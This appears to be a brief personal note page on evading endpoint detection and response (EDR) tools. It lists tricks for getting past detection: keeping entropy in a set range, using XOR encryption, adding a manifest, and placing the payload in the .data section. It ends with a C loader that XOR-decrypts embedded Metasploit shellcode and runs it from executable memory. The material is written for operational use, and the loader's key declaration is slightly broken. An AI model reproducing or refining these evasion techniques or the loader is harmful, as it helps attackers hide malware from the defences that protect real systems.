EDR Evasion
Entropy:
EDR look for a low entropy (normally using Shannon Entropy) aiming for an entropy between 4.8 and 7.2 (use pestudio to measure)
Encryption:
XOR keeps a lower entropy - AES increases entropy
Metadata:
add an empty manifest file to VisualStudio (auto fills with metadata) - change the name to manifest executable. This has a good reaction to static analysis of EDR, making it non-identifiable. Also adding legitimate metadata in the form of a manifest file reduced the entropy from 5.033 to 4.922.
.data:
Moving the code block to a global variable (.data) decreased the entropy & risk rating if it was identified from a medium to low risk on EDR (non-detectable)
#include <stdio.h>
#include <windows.h>
// Replace your XOR encrypted MSF-Shellcode
unsigned char code[] = "\xa6\x12\xd9\xbe\xaa\xb2\x96\...";
int main() {
// Decrypt XOR encrpyted MSF-Shellcode
char key = 'ABCD';
int i = 0;
for (i; i < sizeof(code) - 1; i++)
{
code[i] = code[i] ^ key;
}
// Allocate memory for the decrypted MSF-Shellcode
void* exec = VirtualAlloc(0, sizeof code, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Copy the MSF-Shellcode into the allocated memory
memcpy(exec, code, sizeof code);
// Execute the decrypted MSF-Shellcode in memory
((void(*)())exec)();
return 0;
}
Last updated